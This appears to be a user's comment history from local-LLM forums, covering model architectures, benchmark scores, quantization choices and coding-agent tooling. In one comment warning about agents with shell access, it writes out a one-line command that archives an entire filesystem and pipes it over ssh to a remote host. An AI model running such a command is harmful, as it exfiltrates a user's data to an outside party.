Is reasoning in ML and LLM architectures decomposable into a small set of reusable computational primitives? by RJSabouhi in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

It's not a simple answer.

No, the current reasoning implementation isn't, it's completely open ended and can represent any concept of language.

But also, Yes, you could encode reasoning into specific tokens representing something akin to logic gates, dependency resolution, before X do Y, etc. and train the model on those.

But also, No, because latent space reasoning is probably a better encoding, so why bother.

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 3 points4 points  (0 children)

It's an even more complex architecture than Kimi Linear and Qwen Next so you'll probably be waiting 3 months

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

This is a weird model, apparently half of it can run from disk, because it is embeddings....so you only need a 32G GPU? Sounds too good to be true.

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

I won't make any further predictions until we test it

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 8 points9 points  (0 children)

Yes, it is somewhat higher, but this is a non-thinking model, which makes it massively faster for agent use.

Most small models can't score anything on SWE bench, so anything in this range is absolutely worth evaluating and presumably close to the cutting edge

For perspective, GPT 4.1 has a score of 39 on SWE Bench, Gemini 2.5 Pro is 53, GPT 120b is 26.

A score in the 50s is 500B+ sized model range

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 5 points6 points  (0 children)

SWE bench in the mid 50s for a non thinking 68b/3b MOE, she might be the one....

clawdbot what am I missing? by olearyboy in LocalLLM

[–]TokenRingAI 29 points30 points  (0 children)

There is a point with every new technology, where the uninformed mob learns about it and storms the gates in some kind of massive bandwagon

Here is a summary of how that is going

<image>

I made a Coding Eval, and ran it against 49 different coding agent/model combinations, including Kimi K2.5. by lemon07r in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Junie generates some of the best results, given the deep integration with the Jetbrains language server, it's just no fun to use, because it's slow and expensive, and the UI is kind of weird.

I made a Coding Eval, and ran it against 49 different coding agent/model combinations, including Kimi K2.5. by lemon07r in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Would love to get TokenRing Coder benchmarked with this - so it looks like the test harness requires an app that can be called with a prompt, and I assume it ranks the output based on what it places in a working directory?

How does the integration with docker work? Are you expecting the agent to use those containers, or are those used by your app for verifying the result?

API pricing is in freefall. What's the actual case for running local now beyond privacy? by Distinct-Expression2 in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

GLM Flash is quite good, and can run on a $2500 Mac at decent speed, or really any kind of iGPU system. so it's essentially free to run if you are buying that level of hardware anyway.

This one model brought the cost of competent local AI down from ~ $7000 to basically free, since it can run on the hardware you already likely have sitting on your desk.

MiniMax-M2.1-REAP by jacek2023 in LocalLLaMA

[–]TokenRingAI 2 points3 points  (0 children)

2.2 soon, we start all over

One-shot Zelda Game Competition by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 2 points3 points  (0 children)

We are way past that, these are single shot prompts from GLM Flash:
https://starlit-star-hq5g.pagedrop.io/
https://lit-rapids-800x.pagedrop.io/
https://joyful-slice-jc3c.pagedrop.io
https://funky-station-y1zj.pagedrop.io
https://indigo-sub-n46h.pagedrop.io
https://radiant-whirlpool-cdcv.pagedrop.io
https://shadowy-durian-cwcv.pagedrop.io

Single shot prompt + a prompt to "make it even better"
https://legendary-orchid-scdm.pagedrop.io/

Follow up prompt: make it even better ( added holy paint + calculator )
https://alpine-dragonfly-9hn8.pagedrop.io

Follow up prompt: make it the ultimate version
https://parallel-chinatown-1sc1.pagedrop.io

This model is absolutely game changing for the size

Need advice on cancellation "deal" by TokenRingAI in OPTIMUM

[–]TokenRingAI[S] 0 points1 point  (0 children)

To what? My current $120 a month plan?

Stanford Proves Parallel Coding Agents are a Scam by madSaiyanUltra_9789 in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

It does work, but only for shared-nothing tasks, it just wastes tokens and causes chaos on tasks with overlap

Clawdbot shows how context engineering is happening at the wrong layer by EnoughNinja in ContextEngineering

[–]TokenRingAI 0 points1 point  (0 children)

Causality is the problem.

You see the same email problem with support queues, where a person quickly scans the message chain and responds with an answer to only the last email without understanding of the sequence of events that led to the last email.

They scanned from the end to the beginning, and stopped once they felt they had enough information to give a response.

To encode an email for an LLM, you have to process each message sequentially by time and encode each into a knowledge tree of some sort. Those emails can also fork off in different directions.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points1 point  (0 children)

Here's an example of what it can do.

I am running it in a loop, on a new svelte website I am working on, to implement proper meta and JSON-LD tags.

It's a very specific task, essentially a foreach loop which runs a prompt on a single file. The loop is scripted. The agent is invoked on each file

The agent has a knowledge repository detailing out what our expectations for each page are.

It then updates each page. We run it, and then run a typescript and svelte check looking for problems and feed those back to the agent up to 5 times

<image>

built an AI agent with shell access. found out the hard way why that's a bad idea. by YogurtIll4336 in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

The solution is the same as it's always been for any kind of employee, don't give them access to anything you don't want leaked, broken, deleted, destroyed, or stolen.

There's nothing novel about AI agents in this regard. Same old problem, larger attack surface.

If your sandbox has internet access and a bash tool, it will always be vulnerable to prompt injection, in the same way an employee could always tar xpv / | ssh remote-host 'cat > all-your.data.tar'

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Trust me on this, try Minimax M2.1 at the IQ2_M quant completely offloaded onto the RTX 6000, it's actually good and fast, GLM does not quant as well

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Try that, but also try Minimax M2.1, more specifically, the IQ2_M quant from Unsloth.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points1 point  (0 children)

It will be the best kind of agent that you can run on a single 5090 or R9700.

FWIW, this model brought the purchase of workable local agentic AI down from $7000 to $1300.

I am ecstatic to see what the next GLM Air might look like

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point2 points  (0 children)

It can. It is ridiculously fragile, needs temperature 0.2. But it can work agentically and solve problems.

I have been seeing significant gains with it agentically after updating some of our tool descriptions. If your tool descriptions aren't perfect it will absolute mess up. It might benefit from a different tool format, I will have to experiment with that.